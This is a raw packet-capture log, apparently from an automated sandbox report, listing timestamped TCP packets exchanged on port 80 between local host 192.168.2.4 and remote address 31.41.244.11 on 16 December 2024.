                                                                                                                                                                                              Dec 16, 2024 01:01:25.273366928 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.273399115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.284878969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.284934998 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.285017967 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.285303116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.285366058 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.285443068 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.286247015 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.286314964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.286329985 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.286387920 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.287383080 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.287452936 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.408687115 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.408741951 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.408823967 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.409137011 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.409199953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.409202099 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.409269094 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.410445929 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.410499096 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.410552979 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.411400080 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.411454916 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.411470890 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.411567926 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.412394047 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.412466049 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.412509918 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.412622929 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.413553953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.413678885 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.413757086 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.414722919 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.414794922 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.414864063 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.414921045 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.415899038 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.415968895 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.416018963 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.416070938 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.417088032 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.417160988 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.417174101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.417223930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.418246984 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.418309927 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.418355942 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.418406010 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.419399023 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.419476032 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.419523001 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.419570923 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.420602083 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.420651913 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.420717955 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.420763016 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.421746969 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.421878099 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.421926975 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.422923088 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.422965050 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.423031092 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.423073053 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.424108028 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.424154043 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.424221039 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.424264908 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.425270081 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.425317049 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.425479889 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.425529957 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.426467896 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.426632881 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.426687002 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.427637100 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.427686930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.427752018 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.427798033 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.428787947 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.428836107 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.428904057 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.428952932 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.429944038 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.430083990 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.430131912 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.431099892 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.431166887 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.431235075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.431456089 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.432290077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.432348967 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.432415962 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.432462931 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.433468103 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.433614016 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.433661938 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.434643030 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.434695005 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.434748888 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.434794903 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.435815096 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.435863018 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.435923100 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.435964108 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.437002897 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.437052965 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.437117100 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.438153028 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.438201904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.438261986 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.438304901 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.439287901 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.439340115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.439424038 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.439472914 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.440490961 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.440538883 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.440588951 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.440630913 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.441639900 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.441689014 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.441770077 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.442738056 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.442819118 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.442920923 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.442967892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.443984985 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.444116116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.444178104 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.445173979 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.445231915 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.445291996 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.445951939 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.446336985 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.446456909 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.446829081 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.447519064 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.447629929 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.447693110 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.448697090 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.448766947 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.448824883 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.448904991 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.449861050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.449963093 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.449997902 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.450061083 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.451023102 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.451085091 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.451153040 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.451211929 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.452203035 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.452255964 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.452332973 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.452383041 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.453381062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.453444958 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.453525066 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.453654051 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.454560041 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.454611063 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.454653978 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.454700947 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.455694914 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.455758095 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.455817938 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.455980062 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.456901073 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.456958055 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.457021952 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.457072973 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.458051920 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.458116055 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.458189964 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.458245039 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.459203959 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.459263086 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.459355116 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.459400892 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.460429907 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.460530996 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.460547924 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.460599899 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.461565971 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.461683989 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.461720943 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.461755037 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.462738037 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.462805986 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.462867022 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.462920904 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.463903904 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.464021921 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.464065075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.464118958 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.465074062 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.465133905 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.465213060 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.465295076 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.479434967 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.479470968 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.479521990 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.479567051 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.480072975 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.480125904 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.480149031 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.480182886 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.480993986 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.481034040 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.481060982 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.481092930 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.481945038 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.482003927 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.482016087 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.482081890 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.600707054 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.600761890 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.600794077 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.600877047 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.601176023 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.601243019 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.601315022 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.601372957 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.601438046 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.601490021 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.602684021 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.602737904 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.602755070 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.602793932 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.603707075 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.603791952 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.603796959 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.603847980 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.604463100 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.604525089 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.604633093 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.604686975 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.605644941 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.605710030 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.605742931 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.605827093 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.606794119 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.606909990 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.606919050 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.606975079 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.607997894 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.608079910 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.608172894 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.608243942 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.609146118 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.609215975 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.609276056 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.609460115 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.610305071 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.610466003 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.610476971 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.610527039 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.611521959 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.611577988 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.611583948 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.611629009 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.612658978 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.612715006 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.612790108 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.612857103 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.613816977 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.613892078 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.613964081 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.614016056 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.614985943 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.615057945 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.615094900 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.615149021 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.616156101 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.616219997 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.616286039 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.616386890 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.617325068 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.617423058 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.617450953 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.617496014 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.618494987 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.618560076 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.618612051 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.618660927 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.619673014 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.619796038 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.619796991 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.619844913 CET4980080192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:25.620897055 CET804980031.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:25.620974064 CET4980080192.168.2.431.41.244.11
